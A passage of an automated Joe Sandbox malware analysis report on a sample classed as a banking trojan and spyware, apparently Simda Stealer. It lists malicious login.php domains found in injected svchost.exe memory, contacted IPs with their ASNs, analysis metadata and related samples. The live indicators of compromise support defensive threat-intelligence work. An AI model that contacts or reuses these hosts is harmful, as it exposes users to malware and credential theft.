00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698682542.0000000003345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyxysad.com/login.phpsvchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gacyzuz.com/login.phpsvchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522449527.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565950608.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522570202.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gahyzez.com/login.phpsvchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://purywyl.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lykyjad.com/login.phpsvchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000125D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojydam.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://volyzic.com/login.phpsvchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojycec.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gatyfus.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1692907290.000000000333D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001297000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pufybyv.com/login.phpsvchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzylyp.com/svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000125D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyrytun.com/login.phpsvchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyvyjox.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysyxux.com/svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          3.94.10.34
                                                                                                                                                                                                          		lygynud.comUnited States
                                                                                                                                                                                                          		14618AMAZON-AESUSfalse
                                                                                                                                                                                                          106.15.232.163
                                                                                                                                                                                                          		unknownChina
                                                                                                                                                                                                          		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                          64.190.63.136
                                                                                                                                                                                                          		www.sedoparking.comUnited States
                                                                                                                                                                                                          		11696NBS11696USfalse
                                                                                                                                                                                                          72.52.179.174
                                                                                                                                                                                                          		pltraffic7.comUnited States
                                                                                                                                                                                                          		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                          154.85.183.50
                                                                                                                                                                                                          		qegyval.comSeychelles
                                                                                                                                                                                                          		134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                                                                                                                                                                          64.225.91.73
                                                                                                                                                                                                          		galynuh.comUnited States
                                                                                                                                                                                                          		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                          52.34.198.229
                                                                                                                                                                                                          		lygyvuj.comUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          75.2.71.199
                                                                                                                                                                                                          		puzylyp.comUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          103.150.10.48
                                                                                                                                                                                                          		gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                          		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                                                                                                                          23.253.46.64
                                                                                                                                                                                                          		gahyqah.comUnited States
                                                                                                                                                                                                          		19994RACKSPACEUSfalse
                                                                                                                                                                                                          199.191.50.83
                                                                                                                                                                                                          		galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                          		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                                                                                          13.248.169.48
                                                                                                                                                                                                          		pupydeq.comUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          103.224.212.210
                                                                                                                                                                                                          		lyxynyx.comAustralia
                                                                                                                                                                                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                          76.223.67.189
                                                                                                                                                                                                          		qexyhuv.comUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          18.208.156.248
                                                                                                                                                                                                          		pupycag.comUnited States
                                                                                                                                                                                                          		14618AMAZON-AESUSfalse
                                                                                                                                                                                                          199.59.243.227
                                                                                                                                                                                                          		77026.bodis.comUnited States
                                                                                                                                                                                                          		395082BODIS-NJUSfalse
                                                                                                                                                                                                          208.100.26.245
                                                                                                                                                                                                          		lyvyxor.comUnited States
                                                                                                                                                                                                          		32748STEADFASTUSfalse
                                                                                                                                                                                                          103.224.182.252
                                                                                                                                                                                                          		vofycot.comAustralia
                                                                                                                                                                                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                          85.17.31.82
                                                                                                                                                                                                          		gatyfus.comNetherlands
                                                                                                                                                                                                          		60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                                                                                                                                                                          188.114.97.3
                                                                                                                                                                                                          		lysyvan.comEuropean Union
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          154.212.231.82
                                                                                                                                                                                                          		gadyniw.comSeychelles
                                                                                                                                                                                                          		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                                                                          44.221.84.105
                                                                                                                                                                                                          		gadyciz.comUnited States
                                                                                                                                                                                                          		14618AMAZON-AESUSfalse
                                                                                                                                                                                                          188.114.96.3
                                                                                                                                                                                                          		qegyhig.comEuropean Union
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                          Analysis ID:1553823
                                                                                                                                                                                                          Start date and time:2024-11-11 18:23:03 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 10m 5s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:28
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:13
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:WlCVLbzNph.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:2caf9f151b88a328475181b2ecce22f90694795f.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.bank.troj.spyw.expl.evad.winEXE@10/52@2221/23
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                                                                          • Number of executed functions: 117
                                                                                                                                                                                                          • Number of non-executed functions: 213
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.23.209.176, 2.23.209.179, 2.23.209.177, 2.23.209.149, 2.23.209.150, 2.23.209.187, 2.23.209.182, 2.23.209.185, 2.23.209.158, 2.23.209.189, 2.23.209.130, 20.42.65.92, 20.42.73.29
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, www.bing.com.edgekey.net, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ocsp.edge.digicert.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: WlCVLbzNph.exe

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          12:24:49API Interceptor7x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                          12:25:01API Interceptor529380x Sleep call for process: svchost.exe modified

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          3.94.10.34Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • lygynud.com/login.php
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • lymyxid.com/login.php
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • lymyxid.com/login.php
                                                                                                                                                                                                          AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                          • ctdtgwag.biz/wikoehfueo
                                                                                                                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                          • ctdtgwag.biz/xyrpanl
                                                                                                                                                                                                          Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                          • gvijgjwkh.biz/maxlthgls
                                                                                                                                                                                                          AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • ypituyqsq.biz/grbkwbsae
                                                                                                                                                                                                          SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • ctdtgwag.biz/dpaslnrfmhydrsi
                                                                                                                                                                                                          AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • ctdtgwag.biz/dpop
                                                                                                                                                                                                          RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                          • gvijgjwkh.biz/unx
                                                                                                                                                                                                          106.15.232.163Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 106.15.232.163:8000/dh/147287063_343064.html
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 106.15.232.163:8000/dh/147287063_134827.html
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 106.15.232.163:8000/dh/147287063_472994.html
                                                                                                                                                                                                          64.190.63.136Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • ww16.vofycot.com/login.php?sub1=20241112-0413-3653-b9c7-4bbc444bdc48
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • ww16.vofycot.com/login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • ww16.vofycot.com/login.php?sub1=20241112-0352-0187-b8de-fd2bfab34f87
                                                                                                                                                                                                          http://afilias-grs.netGet hashmaliciousUnknownBrowse
